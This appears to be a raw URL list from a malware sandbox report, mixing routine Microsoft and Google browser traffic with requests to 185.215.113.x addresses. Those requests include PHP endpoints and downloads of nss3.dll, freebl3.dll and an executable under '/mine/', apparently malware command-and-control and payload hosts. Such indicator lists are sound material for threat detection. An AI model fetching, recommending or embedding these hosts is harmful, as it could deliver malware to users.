        https://c.msn.com/c.gif?rnd=1732532933075&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=354610ce91cb4454a7edd3a26242369f&activityId=354610ce91cb4454a7edd3a26242369f&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 false
          		high
          http://185.215.113.43/Zu7JuNko/index.php false
            		high
            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732532939876&w=0&anoncknm=app_anon&NoResponseBody=true false
              		high
              http://185.215.113.206/68b591d6548ec281/freebl3.dll false
                		high
                http://185.215.113.206/68b591d6548ec281/nss3.dll false
                  		high
                  https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
                    		high
                    185.215.113.206/c4becf79229cb002.php false
                      		high
                      https://ntp.msn.com/edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true false
                        		high
                        https://assets.msn.com/statics/icons/favicon_newtabpage.png false
                          		high
                          http://185.215.113.206/68b591d6548ec281/vcruntime140.dll false
                            		high
                            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732532939939&w=0&anoncknm=app_anon&NoResponseBody=true false
                              		high
                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732532933073&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true false
                                		high
                                https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx false
                                  		high
                                  http://185.215.113.16/mine/random.exe false
                                    		high